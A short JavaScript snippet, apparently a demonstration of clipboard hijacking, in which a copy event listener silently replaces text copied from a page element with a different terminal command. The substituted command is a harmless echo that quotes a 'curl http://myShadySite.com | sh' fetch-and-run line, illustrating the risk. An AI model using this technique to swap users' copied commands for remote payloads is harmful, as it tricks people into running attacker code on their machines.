replace copy paste terminal
document.getElementById('copyme').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',
'echo "this could have been [curl http://myShadySite.com | sh]"\n'
);
e.preventDefault();
});